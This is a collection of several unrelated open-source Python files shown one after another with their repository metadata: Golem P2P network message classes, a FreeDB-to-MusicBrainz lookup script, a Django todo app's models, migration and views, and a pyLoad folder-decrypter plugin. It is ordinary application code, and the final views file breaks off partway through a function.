            dest_node_key_id = dict_repr[m.DEST_NODE_KEY_ID_STR]
        self.conn_id = conn_id
        self.key_id = key_id
        self.dest_node_key_id = dest_node_key_id

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        m = MessageJoinMiddlemanConn
        return {m.CONN_ID_STR: self.conn_id,
                m.KEY_ID_STR: self.key_id,
                m.DEST_NODE_KEY_ID_STR: self.dest_node_key_id}
class MessageBeingMiddlemanAccepted(Message):
    Type = TASK_MSG_BASE + 19
    MIDDLEMAN_STR = u"MIDDLEMAN"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Announce that this node accepted the role of a middleman.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageBeingMiddlemanAccepted.Type, sig, timestamp)
        if dict_repr:
            # The serialized form carries only a truthy marker flag.
            assert dict_repr.get(MessageBeingMiddlemanAccepted.MIDDLEMAN_STR)

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageBeingMiddlemanAccepted.MIDDLEMAN_STR: True}
class MessageMiddlemanAccepted(Message):
    Type = TASK_MSG_BASE + 20
    MIDDLEMAN_STR = u"MIDDLEMAN"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Announce that this node accepted the connection with a middleman.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageMiddlemanAccepted.Type, sig, timestamp)
        if dict_repr:
            # The serialized form carries only a truthy marker flag.
            assert dict_repr.get(MessageMiddlemanAccepted.MIDDLEMAN_STR)

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageMiddlemanAccepted.MIDDLEMAN_STR: True}
class MessageMiddlemanReady(Message):
    Type = TASK_MSG_BASE + 21
    MIDDLEMAN_STR = u"MIDDLEMAN"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Signal that the other node connected and the middleman session may start.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageMiddlemanReady.Type, sig, timestamp)
        if dict_repr:
            # The serialized form carries only a truthy marker flag.
            assert dict_repr.get(MessageMiddlemanReady.MIDDLEMAN_STR)

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageMiddlemanReady.MIDDLEMAN_STR: True}
class MessageNatPunch(Message):
    Type = TASK_MSG_BASE + 22
    ASKING_NODE_STR = u"ASKING_NODE"
    DEST_NODE_STR = u"DEST_NODE"
    ASK_CONN_ID_STR = u"ASK_CONN_ID"

    def __init__(self, asking_node=None, dest_node=None, ask_conn_id=None, sig="", timestamp=None,
                 dict_repr=None):
        """Ask a node to tell another node about the NAT hole this connection will prepare.

        :param Node asking_node: node that should be informed about the
            potential hole based on this connection
        :param Node dest_node: node that will try to end this connection and
            open a hole in its NAT
        :param uuid ask_conn_id: connection id the asking node gave for reference
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageNatPunch.Type, sig, timestamp)
        m = MessageNatPunch
        if dict_repr:
            asking_node = dict_repr[m.ASKING_NODE_STR]
            dest_node = dict_repr[m.DEST_NODE_STR]
            ask_conn_id = dict_repr[m.ASK_CONN_ID_STR]
        self.asking_node = asking_node
        self.dest_node = dest_node
        self.ask_conn_id = ask_conn_id

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        m = MessageNatPunch
        return {m.ASKING_NODE_STR: self.asking_node,
                m.DEST_NODE_STR: self.dest_node,
                m.ASK_CONN_ID_STR: self.ask_conn_id}
class MessageWaitForNatTraverse(Message):
    Type = TASK_MSG_BASE + 23
    PORT_STR = u"PORT"

    def __init__(self, port=None, sig="", timestamp=None, dict_repr=None):
        """Tell a node to start listening on the given port (to open a NAT hole).

        :param int port: this connection goes out from this port; the other
            node should listen on it
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageWaitForNatTraverse.Type, sig, timestamp)
        if dict_repr:
            port = dict_repr[MessageWaitForNatTraverse.PORT_STR]
        self.port = port

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageWaitForNatTraverse.PORT_STR: self.port}
class MessageNatPunchFailure(Message):
    Type = TASK_MSG_BASE + 24
    NAT_PUNCH_FAILURE_STR = u"NAT_PUNCH_FAILURE"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Report an unsuccessful NAT punch attempt.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageNatPunchFailure.Type, sig, timestamp)
        if dict_repr:
            # The serialized form carries only a truthy marker flag.
            assert dict_repr.get(MessageNatPunchFailure.NAT_PUNCH_FAILURE_STR)

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageNatPunchFailure.NAT_PUNCH_FAILURE_STR: True}
class MessageWaitingForResults(Message):
    Type = TASK_MSG_BASE + 25
    WAITING_FOR_RESULTS_STR = u"WAITING_FOR_RESULTS"

    def __init__(self, sig="", timestamp=None, dict_repr=None):
        """Inform the other node that this node is waiting for results.

        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageWaitingForResults.Type, sig, timestamp)
        if dict_repr:
            # The serialized form carries only a truthy marker flag.
            assert dict_repr.get(MessageWaitingForResults.WAITING_FOR_RESULTS_STR)

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageWaitingForResults.WAITING_FOR_RESULTS_STR: True}
class MessageCannotComputeTask(Message):
    Type = TASK_MSG_BASE + 26
    REASON_STR = u"REASON"
    SUBTASK_ID_STR = u"SUBTASK_ID"

    def __init__(self, subtask_id=None, reason=None, sig="", timestamp=None, dict_repr=None):
        """Inform the other node that this node cannot compute the given subtask.

        (The original docstring was copy-pasted from MessageWaitingForResults.)

        :param subtask_id: id of the subtask that cannot be computed
        :param reason: why the subtask cannot be computed
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageCannotComputeTask.Type, sig, timestamp)
        if dict_repr:
            reason = dict_repr[MessageCannotComputeTask.REASON_STR]
            subtask_id = dict_repr[MessageCannotComputeTask.SUBTASK_ID_STR]
        self.reason = reason
        self.subtask_id = subtask_id

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageCannotComputeTask.REASON_STR: self.reason,
                MessageCannotComputeTask.SUBTASK_ID_STR: self.subtask_id}
RESOURCE_MSG_BASE = 3000
class MessagePushResource(Message):
    Type = RESOURCE_MSG_BASE + 1
    RESOURCE_STR = u"resource"
    COPIES_STR = u"copies"

    def __init__(self, resource=None, copies=0, sig="", timestamp=None, dict_repr=None):
        """Ask that the given number of copies of a resource be pushed to the network.

        :param str resource: resource name
        :param int copies: number of copies
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessagePushResource.Type, sig, timestamp)
        if dict_repr:
            resource = dict_repr[MessagePushResource.RESOURCE_STR]
            copies = dict_repr[MessagePushResource.COPIES_STR]
        self.resource = resource
        self.copies = copies

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessagePushResource.RESOURCE_STR: self.resource,
                MessagePushResource.COPIES_STR: self.copies}
class MessageHasResource(Message):
    Type = RESOURCE_MSG_BASE + 2
    RESOURCE_STR = u"resource"

    def __init__(self, resource=None, sig="", timestamp=None, dict_repr=None):
        """Announce that this node holds the given resource.

        :param str resource: resource name
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageHasResource.Type, sig, timestamp)
        if dict_repr:
            resource = dict_repr[MessageHasResource.RESOURCE_STR]
        self.resource = resource

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageHasResource.RESOURCE_STR: self.resource}
class MessageWantResource(Message):
    Type = RESOURCE_MSG_BASE + 3
    RESOURCE_STR = u"resource"

    def __init__(self, resource=None, sig="", timestamp=None, dict_repr=None):
        """Announce that this node wants to receive the given resource.

        :param str resource: resource name
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageWantResource.Type, sig, timestamp)
        if dict_repr:
            resource = dict_repr[MessageWantResource.RESOURCE_STR]
        self.resource = resource

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageWantResource.RESOURCE_STR: self.resource}
class MessagePullResource(Message):
    Type = RESOURCE_MSG_BASE + 4
    RESOURCE_STR = u"resource"

    def __init__(self, resource=None, sig="", timestamp=None, dict_repr=None):
        """Announce that the given resource is needed.

        :param str resource: resource name
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessagePullResource.Type, sig, timestamp)
        if dict_repr:
            resource = dict_repr[MessagePullResource.RESOURCE_STR]
        self.resource = resource

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessagePullResource.RESOURCE_STR: self.resource}
class MessagePullAnswer(Message):
    Type = RESOURCE_MSG_BASE + 5
    RESOURCE_STR = u"resource"
    HAS_RESOURCE_STR = u"has resource"

    def __init__(self, resource=None, has_resource=False, sig="", timestamp=None, dict_repr=None):
        """Answer whether this peer has the given resource and may send it.

        :param str resource: resource name
        :param bool has_resource: whether this peer has the resource
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessagePullAnswer.Type, sig, timestamp)
        if dict_repr:
            resource = dict_repr[MessagePullAnswer.RESOURCE_STR]
            has_resource = dict_repr[MessagePullAnswer.HAS_RESOURCE_STR]
        self.resource = resource
        self.has_resource = has_resource

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessagePullAnswer.RESOURCE_STR: self.resource,
                MessagePullAnswer.HAS_RESOURCE_STR: self.has_resource}
# Old message. Don't use if it isn't necessary.
class MessageSendResource(Message):
    Type = RESOURCE_MSG_BASE + 6
    RESOURCE_STR = u"resource"

    def __init__(self, resource=None, sig="", timestamp=None, dict_repr=None):
        """Request that the named resource be sent (legacy transport).

        :param str resource: resource name
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageSendResource.Type, sig, timestamp)
        if dict_repr:
            resource = dict_repr[MessageSendResource.RESOURCE_STR]
        self.resource = resource

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageSendResource.RESOURCE_STR: self.resource}
class MessageResourceList(Message):
    Type = RESOURCE_MSG_BASE + 7
    RESOURCES_STR = u"resources"
    OPTIONS_STR = u"options"

    def __init__(self, resources=None, options=None, sig="", timestamp=None, dict_repr=None):
        """Send a list of resources together with transfer options.

        :param resources: resource list
        :param options: transport options object
        :param str sig: signature
        :param float timestamp: current timestamp
        :param dict dict_repr: dictionary representation of a message
        """
        Message.__init__(self, MessageResourceList.Type, sig, timestamp)
        if dict_repr:
            resources = dict_repr[MessageResourceList.RESOURCES_STR]
            options = dict_repr[MessageResourceList.OPTIONS_STR]
        self.resources = resources
        self.options = options

    def dict_repr(self):
        """Serialize this message to a plain dictionary."""
        return {MessageResourceList.RESOURCES_STR: self.resources,
                MessageResourceList.OPTIONS_STR: self.options}
def init_messages():
    """Add supported messages to register messages list.

    Each class is instantiated exactly once, in the original registration
    order (registration presumably happens as a side effect of the Message
    base constructor -- mechanism not visible in this module section).
    """
    message_classes = (
        # Basic messages
        MessageHello,
        MessageRandVal,
        MessageDisconnect,
        MessageChallengeSolution,
        # P2P messages
        MessagePing,
        MessagePong,
        MessageGetPeers,
        MessageGetTasks,
        MessagePeers,
        MessageTasks,
        MessageRemoveTask,
        MessageFindNode,
        MessageGetResourcePeers,
        MessageResourcePeers,
        MessageWantToStartTaskSession,
        MessageSetTaskSession,
        MessageNatHole,
        MessageNatTraverseFailure,
        MessageInformAboutNatTraverseFailure,
        # Ranking messages
        MessageDegree,
        MessageGossip,
        MessageStopGossip,
        MessageLocRank,
        # Task messages
        MessageCannotAssignTask,
        MessageCannotComputeTask,
        MessageTaskToCompute,
        MessageWantToComputeTask,
        MessageReportComputedTask,
        MessageTaskResult,
        MessageTaskResultHash,
        MessageTaskFailure,
        MessageGetTaskResult,
        MessageStartSessionResponse,
        MessageMiddleman,
        MessageJoinMiddlemanConn,
        MessageBeingMiddlemanAccepted,
        MessageMiddlemanAccepted,
        MessageMiddlemanReady,
        MessageNatPunch,
        MessageWaitForNatTraverse,
        MessageNatPunchFailure,
        MessageWaitingForResults,
        MessageSubtaskResultAccepted,
        MessageSubtaskResultRejected,
        MessageDeltaParts,
        MessageResourceFormat,
        MessageAcceptResourceFormat,
        # Resource messages
        MessageGetResource,
        MessageResource,
        MessagePushResource,
        MessageHasResource,
        MessageWantResource,
        MessagePullResource,
        MessagePullAnswer,
        MessageSendResource,
        MessageResourceList,
    )
    for message_class in message_classes:
        message_class()
|
imapp-pl/golem
|
golem/network/transport/message.py
|
Python
|
gpl-3.0
| 70,548
|
#!/usr/bin/env python3
# vim:fileencoding=utf-8
#
# FreeDB2MusicBrainz.py: Submit data from FreeDB to MusicBrainz
# Copyright © 2017 Frederik “Freso” S. Olesen <https://freso.dk/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""""""
# https://bitbucket.org/metabrainz/musicbrainz-server/pull-requests/1393/mbs-7913-allow-seeding-of-non-url-ars-when/diff
# https://bitbucket.org/metabrainz/musicbrainz-server/pull-requests/770/mbs-7285-cant-seed-external-links-to/diff
# https://github.com/metabrainz/picard-plugins/blob/master/plugins/addrelease/addrelease.py
# https://github.com/JonnyJD/musicbrainz-isrcsubmit
import Cddb
import discid
import musicbrainzngs
__version__ = '0.0.0'
# TODO: Switch to HTTPS (port 443) once upstream is fixed:
# https://github.com/alastair/python-musicbrainzngs/issues/197
MUSICBRAINZ_HOST = 'musicbrainz.org'
def cddb_lookup_string(disc):
    """Build the argument string for a FreeDB ``cddb query`` command.

    The CDDB protocol (http://ftp.freedb.org/pub/freedb/latest/CDDBPROTO)
    expects::

        discid ntrks off1 off2 ... nsecs

    i.e. the FreeDB disc ID, the track count, one frame offset per track,
    and finally the total playing length in seconds.
    """
    frame_offsets = " ".join(str(track.offset) for track in disc.tracks)
    return "%s %s %s %s" % (
        disc.freedb_id,
        disc.last_track_num,
        frame_offsets,
        disc.seconds,
    )
def main():
    """Read the disc in the drive and report whether MusicBrainz knows it.

    Falls back to a FreeDB lookup when MusicBrainz has neither a full
    release nor a CD stub for the disc.
    """
    musicbrainzngs.set_hostname(MUSICBRAINZ_HOST)
    musicbrainzngs.set_useragent('freedb2musicbrainz.py', __version__,
                                 contact='Freso')
    # Read the physical disc first; without it nothing else can happen.
    try:
        disc = discid.read(features=['mcn'])
    except discid.disc.DiscError as err:
        print("Error reading disc: %s" % (err))
        exit(1)
    mb_result = None
    try:
        mb_result = musicbrainzngs.get_releases_by_discid(disc.id)
    except musicbrainzngs.ResponseError as err:
        print(
            'Disc not currently in MusicBrainz (or bad response): %s' %
            (err)
        )
    if mb_result:
        if mb_result.get('disc'):
            print('This release seems to already be in MusicBrainz.')
            print('Check %s to verify that it is the same or submit your specific copy' %
                  (disc.submission_url))
        elif mb_result.get("cdstub"):
            print('There seems to be a CD stub of your disc.')
            print('Go to %s to add the stub fully into the database.' %
                  (disc.submission_url))
        return
    # MusicBrainz knows nothing about the disc; try FreeDB instead.
    print('The release seems to not be in MusicBrainz. Let’s try FreeDB…')
    freedb = Cddb.CddbServer()
    print(cddb_lookup_string(disc))
    freedb_discs = freedb.getDiscs(cddb_lookup_string(disc))
    if freedb_discs:
        for entry in freedb_discs:
            print(entry.artist, "-", entry.title)
    else:
        print('This release is non-existant! Add it to MB!!')
        print(disc.submission_url)
if __name__ == '__main__':
    main()
|
Freso/freedb2musicbrainz
|
freedb2musicbrainz.py
|
Python
|
gpl-3.0
| 3,656
|
# KissTodo - a simple, Django based todo management tool.
# Copyright (C) 2011 Massimo Barbieri - http://www.massimobarbieri.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from django.db.models import Q
from datetime import date, datetime, timedelta
from dateutil.relativedelta import relativedelta
# from dbindexer.api import register_index
class ListManager(models.Manager):
    """Manager for List that knows how to materialize special lists."""

    def get_or_create_inbox(self, user):
        """Return *user*'s inbox list, creating it when missing."""
        the_inbox = self.get_or_create(name=List.INBOX_LIST_NAME, owner=user)[0]
        return the_inbox
class List(models.Model):
    """A named todo list owned by one user.

    A handful of reserved names ("@inbox", "@hot", "@all", "@trash")
    denote special lists that must never be deleted.
    """
    INBOX_LIST_NAME = '@inbox'
    HOT_LIST_NAME = '@hot'
    ALL_LIST_NAME = '@all'
    TRASH_LIST_NAME = '@trash'
    name = models.CharField(max_length=5000)
    owner = models.CharField(max_length=255)
    objects = ListManager()
    def is_special(self):
        # NOTE(review): ALL_LIST_NAME is not treated as special here even
        # though delete() below protects it -- confirm the asymmetry is
        # intentional.
        return self.name==List.INBOX_LIST_NAME or self.name==List.HOT_LIST_NAME or self.name==List.TRASH_LIST_NAME
    def __unicode__(self):
        return u'%s' % (self.name)
    def delete(self):
        """Delete the list unless it is special; todos move to the inbox.

        Any todos still on the list (including soft-deleted ones, seen
        via the raw manager) are re-homed to the owner's inbox before
        the list itself is removed.
        """
        if self.name==List.INBOX_LIST_NAME: return
        if self.name==List.HOT_LIST_NAME: return
        if self.name==List.TRASH_LIST_NAME: return
        if self.name==List.ALL_LIST_NAME: return
        todos_raw = Todo.objects_raw.filter(list=self).all()
        if len(todos_raw)>0:
            inbox_list = List.objects.get_or_create_inbox(self.owner)
            for t in todos_raw:
                t.list=inbox_list
                t.save()
        self.delete_raw()
    def delete_raw(self):
        """Hard-delete the list and every todo still attached to it."""
        for t in Todo.objects_raw.filter(list=self).all(): t.delete_raw() # required by google app engine due to the lack of cascade delete
        super(List, self).delete()
    class Meta:
        ordering = ("name","id")
class TodoManager(models.Manager):
    """Default manager for Todo: hides soft-deleted rows.

    Several methods filter on ``t.list.owner`` in Python instead of in
    the query because the GAE datastore backend cannot filter across the
    ``list__owner`` relation (see inline comments).
    """
    def get_query_set(self):
        # Every default query excludes soft-deleted (trashed) todos.
        return super(TodoManager, self).get_query_set().filter(deleted=False)
    def hot(self, user):
        """Incomplete todos that are prioritized or due within 7 days."""
        next_days = datetime.now()+timedelta(days=7)
        todos_with_priority = Q(complete=False, priority__lt=4)
        todo_within_next_days = Q(complete=False, due_date__lte=next_days, due_date__isnull=False)
        hot = list(self.filter(todos_with_priority).order_by("priority", "description"))
        # GAE does not supports OR query
        for t in self.filter(todo_within_next_days).order_by("due_date", "description"):
            if not t in hot: hot.append(t)
        #hot = self.filter(complete=False, priority__lt=4).order_by("priority", "description")
        #due to a GAE limitation, it is not possibile to filter on list__owner
        return [t for t in hot if t.list.owner == user]
    def search(self, user, string):
        """Case-insensitive substring search over the user's todos."""
        #due to a GAE limitation, it is not possibile to filter on list__owner
        #todos = list(self.filter(idxf_description_l_icontains=string).order_by("idxf_description_l_icontains"))
        #return [t for t in todos if t.list.owner == user]
        todos = self.all()
        return [t for t in todos if t.list.owner == user and t.description.upper().find(string.upper())>-1]
    def deleted(self, user):
        """Soft-deleted (trashed) todos belonging to *user*."""
        deleted = super(TodoManager, self).get_query_set().filter(deleted=True).order_by("priority", "description")
        #due to a GAE limitation, it is not possibile to filter on list__owner
        return [t for t in deleted if t.list.owner == user]
    def all_by_user(self, user):
        """All non-deleted todos belonging to *user*."""
        return [t for t in self.all() if t.list.owner == user]
class Todo(models.Model):
    """A single todo item.

    Deletion is two-stage: the first delete() soft-deletes (sets the
    ``deleted`` flag, i.e. moves the item to the trash); a second
    delete() removes the row for real.  ``objects`` hides soft-deleted
    rows, ``objects_raw`` sees everything.
    """
    description = models.CharField(max_length=5000)
    # Default 4; TodoManager.hot() treats priority < 4 as "prioritized".
    priority = models.IntegerField(default=4)
    complete = models.BooleanField(default=False)
    list = models.ForeignKey(List)
    # Soft-delete flag (trash); see delete()/undelete() below.
    deleted = models.BooleanField(default=False)
    due_date = models.DateTimeField(null=True, blank=True)
    # NOTE: the 'choiches' typo is kept -- renaming the attribute would
    # be an interface change.
    repeat_type_choiches = (('', ' - no repeat - '), ('d', 'days'), ('w', 'weeks'), ('m', 'months'), ('y', 'years'),)
    repeat_type = models.CharField(max_length=1, choices=repeat_type_choiches, null=True, blank=True)
    repeat_every = models.IntegerField(null=True, blank=True)
    external_source = models.CharField(max_length=255, blank=True)
    external_id = models.CharField(null=True,max_length=2000)
    # notify_minutes < 0 disables notification (see update_notify_todo).
    notify_minutes = models.IntegerField(default=-1)
    notify_todo = models.BooleanField(default=False)
    time_offset = models.IntegerField(default=0)
    objects = TodoManager()
    objects_raw = models.Manager()
    def delete(self):
        """First call soft-deletes (trash); second call deletes for real."""
        if self.deleted==False:
            self.deleted=True
            self.save()
        else:
            self.delete_raw()
    def toggle_complete(self):
        """Toggle completion.

        Completing a repeating todo does not mark it complete; instead
        its due date is advanced by the configured repeat interval.
        NOTE(review): the new due_date is a ``date`` while the field is a
        DateTimeField -- confirm the backend coerces this consistently.
        """
        if self.complete:
            self.complete = False
        else:
            if (self.repeat_type and self.repeat_every):
                today = datetime.now().date()
                if self.repeat_type=="d":
                    self.due_date = today + timedelta(days=self.repeat_every)
                elif self.repeat_type=="w":
                    self.due_date = today + timedelta(days=self.repeat_every*7)
                elif self.repeat_type=="m":
                    self.due_date = today + relativedelta(months=self.repeat_every)
                elif self.repeat_type=="y":
                    self.due_date = today + relativedelta(years=self.repeat_every)
                self.update_notify_todo()
            else:
                self.complete = True
    def undelete(self):
        """Restore a soft-deleted todo from the trash."""
        self.deleted=False
        self.save()
    def delete_raw(self):
        """Hard-delete, bypassing the soft-delete stage."""
        super(Todo, self).delete()
    def update_notify_todo(self):
        # A non-negative notify_minutes means notification is enabled.
        if self.notify_minutes>=0:
            self.notify_todo = True
        else:
            self.notify_todo = False
    def is_today(self):
        """True when the todo is due today (False when it has no due date)."""
        if self.due_date is None: return False
        return self.due_date.date() == datetime.now().date()
    def is_overdue(self):
        """True when the due date is in the past (False when unset)."""
        if self.due_date is None: return False
        return self.due_date.date() < datetime.now().date()
    def postpone(self):
        """Push the due date one day forward (today+1 when unset)."""
        # NOTE(review): when due_date was None this assigns a date, then
        # adds a timedelta to it; otherwise it adds to a datetime --
        # confirm both shapes are acceptable to callers.
        if self.due_date is None: self.due_date = datetime.now().date()
        self.due_date = self.due_date + timedelta(days=1)
    def __unicode__(self):
        return u'%s' % (self.description)
    class Meta:
        ordering = ("complete","due_date","priority","description","id")
    @staticmethod
    def todo_sort(todos, mode):
        """Return todos sorted by mode: 'D' date, 'P' priority, 'A' a-z."""
        if mode=='D':
            todos=list(todos)
            # Python 2 cmp-style sort (list.sort(cmp_func)).
            todos.sort(Todo._todo_sort_date)
        elif mode=='P':
            todos=list(todos)
            todos.sort(Todo._todo_sort_priority)
        elif mode=='A':
            todos=list(todos)
            todos.sort(Todo._todo_sort_az)
        else:
            raise Exception("Unknown sort mode: "+mode)
        return todos
    @staticmethod
    def _todo_sort_date(t1, t2):
        """cmp: complete last, then due date (None last), priority, name, id."""
        if t1.complete!=t2.complete:
            if t1.complete: return 1
            return -1
        elif t1.due_date!=t2.due_date:
            if t1.due_date==None: return 1
            if t2.due_date==None: return -1
            if t1.due_date<t2.due_date: return -1
            return 1
        elif t1.priority!=t2.priority:
            if t1.priority<t2.priority: return -1
            return 1
        elif t1.description!=t2.description:
            if not t1.description:return -1
            if not t2.description:return 1
            if t1.description.upper()<t2.description.upper(): return -1
            return 1
        elif t1.id!=t2.id:
            if t1.id<t2.id: return -1
            return 1
        else:
            return 0
    @staticmethod
    def _todo_sort_priority(t1, t2):
        """cmp: complete last, then priority, due date (None last), name, id."""
        if t1.complete!=t2.complete:
            if t1.complete: return 1
            return -1
        elif t1.priority!=t2.priority:
            if t1.priority<t2.priority: return -1
            return 1
        elif t1.due_date!=t2.due_date:
            if t1.due_date==None: return 1
            if t2.due_date==None: return -1
            if t1.due_date<t2.due_date: return -1
            return 1
        elif t1.description!=t2.description:
            if not t1.description:return -1
            if not t2.description:return 1
            if t1.description.upper()<t2.description.upper(): return -1
            return 1
        elif t1.id!=t2.id:
            if t1.id<t2.id: return -1
            return 1
        else:
            return 0
    @staticmethod
    def _todo_sort_az(t1, t2):
        """cmp: complete last, then case-insensitive name, priority, due, id."""
        if t1.complete!=t2.complete:
            if t1.complete: return 1
            return -1
        elif t1.description!=t2.description:
            if not t1.description:return -1
            if not t2.description:return 1
            if t1.description.upper()<t2.description.upper(): return -1
            return 1
        elif t1.priority!=t2.priority:
            if t1.priority<t2.priority: return -1
            return 1
        elif t1.due_date!=t2.due_date:
            if t1.due_date==None: return 1
            if t2.due_date==None: return -1
            if t1.due_date<t2.due_date: return -1
            return 1
        elif t1.id!=t2.id:
            if t1.id<t2.id: return -1
            return 1
        else:
            return 0
# register_index(Todo, {'description': 'icontains'})
|
BRupholdt/KissTodo
|
todo/models.py
|
Python
|
gpl-3.0
| 10,319
|
# -*- coding: utf-8 -*-
from module.plugins.internal.SimpleCrypter import SimpleCrypter, create_getInfo
class UploadableChFolder(SimpleCrypter):
    """uploadable.ch folder decrypter: extracts file links from a list page.

    All behavior lives in SimpleCrypter; this class only supplies the
    plugin metadata and the regex patterns driving the extraction.
    """
    __name__ = "UploadableChFolder"
    __type__ = "crypter"
    __version__ = "0.06"
    __status__ = "testing"
    __pattern__ = r'http://(?:www\.)?uploadable\.ch/list/\w+'
    __config__ = [("activated" , "bool", "Activated" , True),
                  ("use_premium" , "bool", "Use premium account if available" , True),
                  ("use_subfolder" , "bool", "Save package to subfolder" , True),
                  ("subfolder_per_pack", "bool", "Create a subfolder for each package", True)]
    __description__ = """Uploadable.ch folder decrypter plugin"""
    __license__ = "GPLv3"
    __authors__ = [("guidobelix", "guidobelix@hotmail.it"),
                   ("Walter Purcaro", "vuolter@gmail.com")]
    # Captures the quoted URL that precedes the zip-file icon markup.
    LINK_PATTERN = r'"(.+?)" class="icon_zipfile">'
    # <N> named group holds the folder (package) name.
    NAME_PATTERN = r'<div class="folder"><span>&nbsp;</span>(?P<N>.+?)</div>'
    OFFLINE_PATTERN = r'We are sorry... The URL you entered cannot be found on the server.'
    TEMP_OFFLINE_PATTERN = r'<div class="icon_err">'
getInfo = create_getInfo(UploadableChFolder)
|
fzimmermann89/pyload
|
module/plugins/crypter/UploadableChFolder.py
|
Python
|
gpl-3.0
| 1,264
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-16 05:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an integer ``pid`` field to the ``zapinstance`` model.

    ``default=1234`` exists only to backfill the rows that already
    existed when the column was added; ``preserve_default=False`` keeps
    it out of the final field definition.
    """
    dependencies = [
        ('api', '0002_auto_20170215_0652'),
    ]
    operations = [
        migrations.AddField(
            model_name='zapinstance',
            name='pid',
            field=models.IntegerField(default=1234, verbose_name='PID'),
            preserve_default=False,
        ),
    ]
|
makemytrip/webGuard-Server
|
api/migrations/0003_zapinstance_pid.py
|
Python
|
gpl-3.0
| 505
|
#-*- coding: utf-8 -*-
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render
from django.http import HttpResponse
from profs.processing import *
from profs.models import *
from profs.forms import *
def main(request):
    """Render the site landing page."""
    context = locals()
    return render(request, "profs/main.html", context)
def about(request):
    """Render the about page."""
    context = locals()
    return render(request, "profs/about.html", context)
def contact(request):
    """Render the contact page."""
    context = locals()
    return render(request, "profs/contact.html", context)
@csrf_exempt
# @vary_on_headers('HTTP_X_REQUESTED_WITH') # Needed when using caching
def modules(request):
    """List modules, filterable by semester / subject / teacher.

    A plain GET renders the full page.  An AJAX POST returns a Taconite
    XML fragment that hides the filtered-out module links and disables
    filter <option>s that would produce an empty result set.
    The template context is passed via locals(), so local variable names
    here ARE the template contract -- do not rename them.
    """
    displayedModules = Module.objects.all()
    if request.method == "POST":
        form = ModulesForm(request.POST)
        if form.is_valid():
            # An empty filter falls back to "all" via the `or` idiom.
            semester = Semester.objects.filter(name=form.cleaned_data['semester']) or Semester.objects.all()
            subject = Subject.objects.filter(name=form.cleaned_data['subject']) or Subject.objects.all()
            teacher = Teacher.objects.filter(name=form.cleaned_data['teacher']) or Teacher.objects.all()
            displayedModules = displayedModules.filter(semester__in=semester, subject__in=subject, teacher__in=teacher)
        if request.is_ajax():
            # NOTE(review): if the form is invalid, semester/subject/teacher
            # are unbound here and the loops below would raise NameError --
            # confirm invalid AJAX posts cannot happen.
            xmlResponse = Taconite()
            xmlResponse.show(".collection > a")
            hiddenModules = Module.objects.exclude(id__in=displayedModules)
            for module in hiddenModules:
